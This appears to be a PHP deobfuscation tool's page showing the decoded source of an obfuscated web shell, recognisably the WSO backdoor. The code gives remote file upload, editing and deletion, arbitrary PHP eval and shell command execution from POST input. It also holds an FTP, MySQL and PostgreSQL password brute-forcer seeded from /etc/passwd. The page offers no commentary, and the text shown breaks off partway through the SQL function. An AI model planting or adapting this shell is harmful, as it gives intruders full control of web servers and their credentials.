Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto Cjo7J; LqaMO: $safe_mode = @ini_get("safe_mode"); goto zGahs; zGahs: if (!$saf..
Decoded Output download
<?php
goto Cjo7J; LqaMO: $safe_mode = @ini_get("safe_mode"); goto zGahs; zGahs: if (!$safe_mode) { error_reporting(0); } goto Gop14; j2Rfu: if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) { call_user_func("action" . $_POST["a"]); } goto Zxful; GFRHq: @ini_set("error_log", NULL); goto g7ZCc; N84uU: function actionFilesMan() { goto J7jRR; la8rp: if (class_exists("ZipArchive")) { echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; } goto GTtN3; uO4Od: if (!empty($_POST["p1"])) { switch ($_POST["p1"]) { case "uploadFile": if (!@move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) { echo "Can't upload file!"; } break; case "mkdir": if (!@mkdir($_POST["p2"])) { echo "Can't create new dir"; } break; case "delete": goto zgV_d; mm32x: break; goto hEfbk; zgV_d: function deleteDir($path) { goto RrCM3; zxeby: $dh = opendir($path); goto TCJ3G; TCJ3G: while (($item = readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == ".." || basename($item) == ".") { continue; } $type = filetype($item); if ($type == "dir") { deleteDir($item); } else { @unlink($item); } } goto qhDI4; SLRoZ: @rmdir($path); goto ld2N6; RrCM3: $path = substr($path, -1) == "/" ? $path : $path . "/"; goto zxeby; qhDI4: closedir($dh); goto SLRoZ; ld2N6: } goto Jstso; Jstso: if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { goto Fce39; jTf8C: if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } goto sVDIO; Fce39: if ($f == "..") { continue; } goto NavX2; NavX2: $f = urldecode($f); goto jTf8C; sVDIO: } } goto mm32x; hEfbk: case "paste": goto aIzMf; aIzMf: if ($_COOKIE["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { goto DXZu5; OpM7_: $h = @opendir($c . $s); goto XF_lF; XF_lF: while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } goto v_Vn9; DXZu5: mkdir($d . $s); goto OpM7_; v_Vn9: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { copy_paste($_COOKIE["c"], $f, $GLOBALS["cwd"]); } } elseif ($_COOKIE["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { goto qKJrU; TXDEI: while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } goto xPGvS; AwOVO: $h = @opendir($c . $s); goto TXDEI; qKJrU: mkdir($d . $s); goto AwOVO; xPGvS: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["f"] as $f) { @rename($_COOKIE["c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_COOKIE["act"] == "zip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); if ($zip->open($_POST["p2"], 1)) { goto Jun5P; Jun5P: chdir($_COOKIE["c"]); goto T_RpN; MVV2r: $zip->close(); goto CqwAG; T_RpN: foreach ($_COOKIE["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_COOKIE["c"] . $f)) { $zip->addFile($_COOKIE["c"] . $f, $f); } elseif (@is_dir($_COOKIE["c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/")); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } goto JhWjt; JhWjt: chdir($GLOBALS["cwd"]); goto MVV2r; CqwAG: } } } elseif ($_COOKIE["act"] == "unzip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_COOKIE["f"] as $f) { if ($zip->open($_COOKIE["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_COOKIE["act"] == "tar") { goto nrwbR; QmWa1: chdir($GLOBALS["cwd"]); goto bK26y; zHKjB: wsoEx("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_COOKIE["f"])); goto QmWa1; BU3zr: $_COOKIE["f"] = array_map("escapeshellarg", $_COOKIE["f"]); goto zHKjB; nrwbR: chdir($_COOKIE["c"]); goto BU3zr; bK26y: } goto tJ8ED; HwZnR: setcookie("f", '', time() - 3600); goto TZk2t; TZk2t: break; goto yoTwQ; tJ8ED: unset($_COOKIE["f"]); goto HwZnR; yoTwQ: default: if (!empty($_POST["p1"])) { goto TYMaj; XHEG8: WSOsetcookie("c", @$_POST["c"]); goto Unr9o; TYMaj: WSOsetcookie("act", $_POST["p1"]); goto XUMLY; XUMLY: WSOsetcookie("f", serialize(@$_POST["f"])); goto XHEG8; Unr9o: } break; } } goto bpziK; JbUVa: usort($files, "wsoCmp"); goto pBUl1; RjKbq: function wsoCmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } goto JbUVa; flVXx: $GLOBALS["sort"] = $sort; goto RjKbq; b42P7: echo "</select> "; goto zga6H; QsnjB: $dirContent = wsoScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]); goto DufhY; EoM5y: if (!empty($_POST["p1"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match)) { $sort = array($match[1], (int) $match[2]); } } goto uaEIV; ecDrl: echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>"; goto QsnjB; J7jRR: if (!empty($_COOKIE["f"])) { $_COOKIE["f"] = @unserialize($_COOKIE["f"]); } goto uO4Od; zqQv8: foreach ($files as $f) { echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools',null,'" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" " . (empty($f["link"]) ? '' : "title='{$f["link"]}'") . "><b>[ " . htmlspecialchars($f["name"]) . " ]</b>") . "</a></td><td>" . ($f["type"] == "file" ? wsoViewSize($f["size"]) : $f["type"]) . "</td><td>" . $f["modify"] . "</td><td>" . $f["owner"] . "/" . $f["group"] . "</td><td><a href=# onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "','chmod')">" . $f["perms"] . "</td><td><a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'touch')">T</a>" . ($f["type"] == "file" ? " <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } goto b9q_L; ICFmG: $l = 0; goto zqQv8; TSLht: $n = count($dirContent); goto p625P; lC5LC: $dirs = $files = array(); goto TSLht; uaEIV: echo "<script>\xd
function sa() {
for(i=0;i<d.files.elements.length;i++)
\x9 if(d.files.elements[i].type == 'checkbox')\xd\xa \x9 d.files.elements[i].checked = d.files.elements[0].checked;\xd\xa }\xd\xa</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xd
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")'>Permissions</a></th><th>Actions</th></tr>"; goto lC5LC; b9q_L: echo "<tr><td colspan=7>\xd\xa <input type=hidden name=a value='FilesMan'>\xd\xa\x9<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>
\xa <input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xd\xa <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; goto la8rp; MMpaa: $sort = array("name", 1); goto EoM5y; bpziK: wsoHeader(); goto ecDrl; GTtN3: echo "<option value='tar'>Compress (tar.gz)</option>"; goto qCBL1; zga6H: if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar")) { echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "'> "; } goto T3WX2; DufhY: if ($dirContent === false) { goto KJVLY; PFKsl: wsoFooter(); goto ZsRi7; KJVLY: echo "Can't open this folder!"; goto PFKsl; ZsRi7: return; goto Uwcm2; Uwcm2: } goto S7vm3; T3WX2: echo "<input type='submit' value='>>'></td></tr></form></table></div>"; goto LlrBb; LlrBb: wsoFooter(); goto JxN5l; S7vm3: global $sort; goto MMpaa; pBUl1: usort($dirs, "wsoCmp"); goto zukJ7; p625P: for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => wsoPermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } goto flVXx; qCBL1: if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) { echo "<option value='paste'>Paste / Compress</option>"; } goto b42P7; zukJ7: $files = array_merge($dirs, $files); goto ICFmG; JxN5l: } goto KC9ar; xB4MH: function actionFilesTools() { goto BkWtk; URhzm: if (is_file($_POST["p1"])) { $m = array("View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch"); } else { $m = array("Chmod", "Rename", "Touch"); } goto ehyTX; gIv2Z: echo "</div>"; goto q1Rl0; ehyTX: foreach ($m as $v) { echo "<a href=# onclick="g(null,null,'" . urlencode($_POST["p1"]) . "','" . strtolower($v) . "')">" . (strtolower($v) == @$_POST["p2"] ? "<b>[ " . $v . " ]</b>" : $v) . "</a> "; } goto OeBNf; FcH_v: if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } goto XQqyZ; tJhrh: if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } goto UpcWr; hJxBN: echo "<h1>File tools</h1><div class=content>"; goto LggyK; jReNS: if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } goto URhzm; OeBNf: echo "<br><br>"; goto kfx86; vLiGd: echo "<span>Create time:</span> " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "<br><br>"; goto jReNS; LggyK: if (!file_exists(@$_POST["p1"])) { goto uyJNU; C_fb1: return; goto fRIHs; uyJNU: echo "File not exists"; goto aEu8k; aEu8k: wsoFooter(); goto C_fb1; fRIHs: } goto RVSqZ; BkWtk: if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } goto nB0r7; UpcWr: wsoHeader(); goto hJxBN; q1Rl0: wsoFooter(); goto lZIie; RVSqZ: $uid = @posix_getpwuid(@fileowner($_POST["p1"])); goto FcH_v; kfx86: switch ($_POST["p2"]) { case "view": goto QAifq; bn9Hw: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto bbBoN; bbBoN: echo "</pre>"; goto K9Wsy; GqRN7: $fp = @fopen($_POST["p1"], "r"); goto bn9Hw; K9Wsy: break; goto xBp1j; QAifq: echo "<pre class=ml1>"; goto GqRN7; xBp1j: case "highlight": if (@is_readable($_POST["p1"])) { goto QC8Iq; XU2TQ: $code = @highlight_file($_POST["p1"], true); goto MtAXT; QC8Iq: echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">"; goto XU2TQ; MtAXT: echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $code) . "</div>"; goto nntLP; nntLP: } break; case "chmod": goto P8hG1; LoNwV: break; goto AyuC5; lmil1: echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.chmod.value);return false;"><input type=text name=chmod value="" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . ""><input type=submit value=">>"></form>"; goto LoNwV; AAUh2: clearstatcache(); goto lmil1; P8hG1: if (!empty($_POST["p3"])) { goto dVl9Y; brcvZ: for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } goto NKCFJ; NKCFJ: if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!<br><script>document.mf.p3.value="";</script>"; } goto PY3E2; dVl9Y: $perms = 0; goto brcvZ; PY3E2: } goto AAUh2; AyuC5: case "edit": goto H2fMN; jCDwf: echo "</textarea><input type=submit value=">>"></form>"; goto Pjp_6; l2f3k: echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>"; goto B2Klk; YessQ: if (!empty($_POST["p3"])) { goto rcwpk; JCP0G: $fp = @fopen($_POST["p1"], "w"); goto UIGX9; UIGX9: if ($fp) { goto AyUGu; ZpECv: echo "Saved!<br><script>p3_="";</script>"; goto ukKwu; zJt34: @fclose($fp); goto ZpECv; AyUGu: @fwrite($fp, $_POST["p3"]); goto zJt34; ukKwu: @touch($_POST["p1"], $time, $time); goto w_o1Q; w_o1Q: } goto ccEmf; yLb3a: $_POST["p3"] = substr($_POST["p3"], 1); goto JCP0G; rcwpk: $time = @filemtime($_POST["p1"]); goto yLb3a; ccEmf: } goto l2f3k; H2fMN: if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } goto YessQ; B2Klk: $fp = @fopen($_POST["p1"], "r"); goto of9BR; of9BR: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto jCDwf; Pjp_6: break; goto Gznea; Gznea: case "hexdump": goto m3kPv; AuUGX: $h = array("00000000<br>", '', ''); goto GyLAr; qeOJi: $n = 0; goto AuUGX; jL3k2: echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#282828><pre>" . $h[1] . "</pre></td><td bgcolor=#333333><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; goto Ufiap; m3kPv: $c = @file_get_contents($_POST["p1"]); goto qeOJi; Lem2Z: for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { goto NPU7A; NPU7A: $n = 0; goto LQkUO; fObRZ: $h[1] .= "<br>"; goto fMXko; LQkUO: if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } goto fObRZ; fMXko: $h[2] .= "
"; goto BJu_G; BJu_G: } } goto jL3k2; GyLAr: $len = strlen($c); goto Lem2Z; Ufiap: break; goto owLSP; owLSP: case "rename": goto DPp_y; zaQju: break; goto Mf7Ir; DPp_y: if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!<br>"; } else { die("<script>g(null,null,"" . urlencode($_POST["p3"]) . "",null,"")</script>"); } } goto S0xqX; S0xqX: echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.name.value);return false;"><input type=text name=name value="" . htmlspecialchars($_POST["p1"]) . ""><input type=submit value=">>"></form>"; goto zaQju; Mf7Ir: case "touch": goto MdNj9; fcpc8: echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.touch.value);return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . ""><input type=submit value=">>"></form>"; goto vSHOq; vSHOq: break; goto RapuR; GWQpw: clearstatcache(); goto fcpc8; MdNj9: if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } goto GWQpw; RapuR: } goto gIv2Z; nB0r7: if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { goto kEAXk; LrqUY: $fp = @fopen($_POST["p1"], "r"); goto oCCHm; rpfQA: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["p1"]); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto LrqUY; oCCHm: if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } goto Vqm3n; PiFXF: header("Content-Disposition: attachment; filename=" . basename($_POST["p1"])); goto rpfQA; kEAXk: ob_start("ob_gzhandler", 4096); goto PiFXF; Vqm3n: } exit; } goto tJhrh; XQqyZ: echo "<span>Name:</span> " . htmlspecialchars(@basename($_POST["p1"])) . " <span>Size:</span> " . (is_file($_POST["p1"]) ? wsoViewSize(filesize($_POST["p1"])) : "-") . " <span>Permission:</span> " . wsoPermsColor($_POST["p1"]) . " <span>Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . "<br>"; goto vLiGd; lZIie: } goto w2GF1; etiAC: function wsoPerms($p) { goto kfyb8; GUcgT: $i .= $p & 0x1 ? $p & 0x200 ? "t" : "x" : ($p & 0x200 ? "T" : "-"); goto mshmE; kfyb8: if (($p & 0xc000) == 0xc000) { $i = "s"; } elseif (($p & 0xa000) == 0xa000) { $i = "l"; } elseif (($p & 0x8000) == 0x8000) { $i = "-"; } elseif (($p & 0x6000) == 0x6000) { $i = "b"; } elseif (($p & 0x4000) == 0x4000) { $i = "d"; } elseif (($p & 0x2000) == 0x2000) { $i = "c"; } elseif (($p & 0x1000) == 0x1000) { $i = "p"; } else { $i = "u"; } goto pqnZD; GuUyD: $i .= $p & 0x2 ? "w" : "-"; goto GUcgT; Vg6sO: $i .= $p & 0x10 ? "w" : "-"; goto vneDY; I8J2d: $i .= $p & 0x40 ? $p & 0x800 ? "s" : "x" : ($p & 0x800 ? "S" : "-"); goto yfJn7; pqnZD: $i .= $p & 0x100 ? "r" : "-"; goto FjLaa; yfJn7: $i .= $p & 0x20 ? "r" : "-"; goto Vg6sO; FjLaa: $i .= $p & 0x80 ? "w" : "-"; goto I8J2d; vneDY: $i .= $p & 0x8 ? $p & 0x400 ? "s" : "x" : ($p & 0x400 ? "S" : "-"); goto e6Pjl; e6Pjl: $i .= $p & 0x4 ? "r" : "-"; goto GuUyD; mshmE: return $i; goto MofP7; MofP7: } goto eRZM6; j4eIF: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $default_use_ajax; } goto EoPoZ; qZOco: if (isset($_POST["c"])) { @chdir($_POST["c"]); } goto sO9OV; tZUOM: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto LqaMO; B8b3D: function actionRC() { if (!@$_POST["p1"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["p1"]); } } goto dPSqc; Gop14: $disable_functions = @ini_get("disable_functions"); goto oE6Ue; oHsYW: function actionPhp() { goto s1VTJ; ujMFQ: wsoFooter(); goto dfcYP; s1VTJ: if (isset($_POST["ajax"])) { goto jtGxB; XiIjv: eval($_POST["p1"]); goto pcNS1; cL7XN: ob_start(); goto XiIjv; keRr1: exit; goto cNits; t7wh1: echo strlen($temp), "
", $temp; goto keRr1; pcNS1: $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa
\'\x0") . "';\xa"; goto t7wh1; jtGxB: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto cL7XN; cNits: } goto IyHRn; wcs04: echo "</pre></div>"; goto ujMFQ; Sz7n2: echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . "</textarea><input type=submit value=Eval style="margin-top:5px">"; goto bE4Om; t2vRD: wsoHeader(); goto om2si; oWPfu: if (!empty($_POST["p1"])) { goto uFjl_; uFjl_: ob_start(); goto XYFVS; qDLEK: echo htmlspecialchars(ob_get_clean()); goto Zre8T; XYFVS: eval($_POST["p1"]); goto qDLEK; Zre8T: } goto wcs04; IyHRn: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto t2vRD; om2si: if (isset($_POST["p2"]) && $_POST["p2"] == "info") { goto u6Vem; u6Vem: echo "<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>"; goto ClNOj; ClNOj: ob_start(); goto Z0UYj; WpKFt: $tmp = preg_replace(array("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU", "!td, th {(.*)}!msiU", "!<img[^>]+>!msiU"), array('', ".e, .v, .h, .h th {$1}", ''), $tmp); goto AiOL8; Z0UYj: phpinfo(); goto pDREm; pDREm: $tmp = ob_get_clean(); goto WpKFt; AiOL8: echo str_replace("<h1", "<h2", $tmp) . "</div><br>"; goto xiXKW; xiXKW: } goto Sz7n2; bE4Om: echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; goto oWPfu; dfcYP: } goto N84uU; jB3VR: $default_charset = "Windows-1251"; goto fj9OS; rTVjF: function actionLogout() { setcookie(md5($_SERVER["HTTP_HOST"]), '', time() - 3600); die("bye!"); } goto i6mTz; DbGtY: function actionBruteforce() { goto uMF9i; hSv50: if (isset($_POST["proto"])) { goto jX4Q5; UnBlf: if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { goto vXxXO; zFefs: if (@$_POST["reverse"]) { goto S2jvF; oahSQ: for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } goto rxcry; S2jvF: $tmp = ''; goto oahSQ; rxcry: ++$attempts; goto TfDj5; TfDj5: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } goto lNTnA; lNTnA: } goto i039d; b2CQw: ++$attempts; goto i1_FI; i1_FI: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } goto zFefs; vXxXO: $line = explode(":", $line); goto b2CQw; i039d: } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { goto kf0wF; NI_R6: if (wsoBruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } goto JCePy; kf0wF: $line = trim($line); goto byC2k; byC2k: ++$attempts; goto NI_R6; JCePy: } } } goto VERJt; jX4Q5: echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; goto LBJl4; VERJt: echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto U2KZG; ObcWW: $server = explode(":", $_POST["server"]); goto UnBlf; LBJl4: if ($_POST["proto"] == "ftp") { function wsoBruteForce($ip, $port, $login, $pass) { goto w1bnC; MJhTf: @ftp_close($fp); goto efLYK; efLYK: return $res; goto zU7bZ; aqJAG: $res = @ftp_login($fp, $login, $pass); goto MJhTf; w1bnC: $fp = @ftp_connect($ip, $port ? $port : 21); goto NYGOQ; NYGOQ: if (!$fp) { return false; } goto aqJAG; zU7bZ: } } elseif ($_POST["proto"] == "mysql") { function wsoBruteForce($ip, $port, $login, $pass) { goto nwkI1; tqKjk: @mysqli_close($res); goto lNvU5; nwkI1: $res = @mysqli_connect($ip . ":" . $port ? $port : 3306, $login, $pass); goto tqKjk; lNvU5: return $res; goto h_hcl; h_hcl: } } elseif ($_POST["proto"] == "pgsql") { function wsoBruteForce($ip, $port, $login, $pass) { goto ucMyA; DgnPW: @pg_close($res); goto qQMP_; qQMP_: return $res; goto N73qn; ucMyA: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto szIUy; szIUy: $res = @pg_connect($str); goto DgnPW; N73qn: } } goto px18Z; px18Z: $success = 0; goto aKdd5; aKdd5: $attempts = 0; goto ObcWW; U2KZG: } goto NNTq8; NNTq8: echo "<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>" . "<input type=hidden name=c value="" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value="" . htmlspecialchars($_POST["a"]) . "">" . "<input type=hidden name=charset value="" . htmlspecialchars($_POST["charset"]) . "">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value="127.0.0.1"></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>" . "<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>" . "<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>" . "<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value="" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>"; goto HIh7o; uMF9i: wsoHeader(); goto hSv50; HIh7o: echo "</div><br>"; goto wlwoF; wlwoF: wsoFooter(); goto p3uSI; p3uSI: } goto wVO2a; uf2tU: $default_use_ajax = true; goto jB3VR; d62j5: function wsoEx($in) { $out = shell_exec($in); return $out; } goto yXkOt; wVO2a: function actionSql() { goto pXyEP; WqMW0: if (@$_POST["type"] == "pgsql") { echo "selected"; } goto bZFnU; qgUXu: echo "</div>"; goto G862b; G862b: wsoFooter(); goto gsteZ; bZFnU: echo ">PostgreSql</option></select></td>
\xa<td><input type=text name=sql_host value="" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . ""></td>\xd
<td><input type=text name=sql_login value="" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . ""></td>
\xa<td><input type=text name=sql_pass value="" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . ""></td><td>"; goto dxViD; dxViD: $tmp = "<input type=text name=sql_base value=''>"; goto L_VIT; Auorx: echo "</td>\xd\xa\x9 \x9 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>\xd\xa <td><input type=checkbox name=sql_count value='on'" . (empty($_POST["sql_count"]) ? '' : " checked") . "> count the number of rows</td>\xd\xa \x9</tr>\xd\xa\x9 </table>
\x9<script>\xd
s_db='" . @addslashes($_POST["sql_base"]) . "';\xd\xa function fs(f) {\xd\xa if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xd
if(f.p1) f.p1.value='';\xd
